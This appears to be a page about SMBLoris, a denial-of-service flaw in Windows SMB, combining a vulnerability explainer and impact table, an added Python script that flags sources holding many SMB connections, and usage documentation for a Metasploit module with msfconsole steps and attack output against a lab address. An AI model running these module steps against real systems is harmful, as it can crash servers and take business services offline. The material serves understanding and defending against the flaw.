SMBLoris Denial of Service Metasploit Module

What is SMBLoris?

SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.

What versions of Windows are affected?

The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.

What is the threat?

It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.

Scenario            Sockets    Attack Cost    Memory Impact
Baseline            1          4 bytes        128 KiB
Single IPv4         65,535     256 KiB        8 GiB
Single IPv6         65,535     256 KiB        8 GiB
Dual IPv4 / IPv6    131,070    512 KiB        16 GiB
10 IPs              655,535    2.5 MiB        80 GiB
  • † CPU impact cannot be meaningfully measured, but is generally quite significant.
  • ‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
    It does not include standard network headers, which are also small overhead for the attacker.

Is there a CVE?

SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:

  • CVE-2012-5568
  • MS09-048 (CVE-2009-1925 and CVE-2009-1926)
  • CVE-2008-4609
  • CVE-2007-6750

Is there a patch?

Not at this time.

What ports are affected?

Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.
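
A defender's check for the condition described above, as an added example (not code from the original page or from the Metasploit project): it parses Windows `netstat -an` output, counts established connections to ports 445 and 139 per remote address, and multiplies by the table's 128 KiB per-socket figure to estimate how much memory one source may be holding. The sample input, its addresses and the alert threshold of 100 are constructed assumptions.

```python
import re
from collections import Counter

SMB_PORTS = {139, 445}        # ports named on this page
BYTES_PER_CONN = 128 * 1024   # page's baseline: 128 KiB memory impact per socket
ALERT_THRESHOLD = 100         # assumption: tune to your busiest legitimate client

# Constructed sample of Windows `netstat -an` output (not captured from a real host).
SAMPLE = "\n".join(
    ["  TCP    10.0.0.5:445    10.0.0.20:49712    ESTABLISHED",
     "  TCP    10.0.0.5:443    10.0.0.21:50111    ESTABLISHED",
     "  TCP    10.0.0.5:139    10.0.0.20:49713    ESTABLISHED",
     "  TCP    0.0.0.0:445     0.0.0.0:0          LISTENING"]
    + [f"  TCP    10.0.0.5:445    10.0.0.99:{p}    ESTABLISHED" for p in range(1025, 1325)]
)

# local address:port, remote address:port, state (IPv6 addresses appear in brackets)
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")

def smb_connections_by_source(netstat_text):
    """Count ESTABLISHED connections to local SMB/NetBIOS ports per remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # headers, UDP rows, blank lines
        _local, lport, remote, _rport, state = m.groups()
        if int(lport) in SMB_PORTS and state == "ESTABLISHED":
            counts[remote.strip("[]")] += 1
    return counts

def suspects(netstat_text, threshold=ALERT_THRESHOLD):
    """Return [(remote, connections, worst_case_bytes)] for sources at or above threshold."""
    return [(ip, n, n * BYTES_PER_CONN)
            for ip, n in smb_connections_by_source(netstat_text).most_common()
            if n >= threshold]

if __name__ == "__main__":
    for ip, n, mem in suspects(SAMPLE):
        print(f"{ip}: {n} SMB connections, up to {mem / 2**20:.1f} MiB held")
```
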

auxiliary/dos/smb/smb_loris Metasploit Module

This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB exposed, or any Linux system running Samba, is vulnerable.
See the SMBLoris page for details on the vulnerability.

The module opens over 64,000 connections to the target service, so please make sure
your system's open-file limit (ulimit) is set appropriately to handle it. A single host
running this module can theoretically consume up to 8GB of memory on the target.

Verification Steps

Example steps:

  1. Start msfconsole
  2. Do: use auxiliary/dos/smb/smb_loris
  3. Do: set RHOST [IP]
  4. Do: run
  5. Target should allocate increasing amounts of memory.

msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris

msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....

Source: Github